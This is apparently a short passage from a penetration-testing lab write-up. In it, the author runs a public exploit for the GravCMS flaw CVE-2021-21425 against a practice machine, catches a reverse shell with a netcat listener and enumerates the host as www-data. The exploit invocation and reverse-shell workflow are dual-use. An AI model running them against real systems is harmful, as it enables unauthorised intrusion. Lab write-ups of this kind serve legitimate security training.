CVE-2021-21425
While the version information of the target GravCMS instance has not been revealed, I will attempt to blindly run an unauthenticated RCE
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/astronaut]
└─$ python3 CVE-2021-21425.py Firing up the exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/astronaut]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.12] 37868
bash: cannot set terminal process group (79873): Inappropriate ioctl for device
bash: no job control in this shell
www-data@gravity:~/html/grav-admin$ whoami
whoami
www-data
www-data@gravity:~/html/grav-admin$ hostname
hostname
gravity
www-data@gravity:~/html/grav-admin$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:67:3a brd ff:ff:ff:ff:ff:ff
inet 192.168.154.12/24 brd 192.168.154.255 scope global ens160
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via exploiting CVE-2021-21425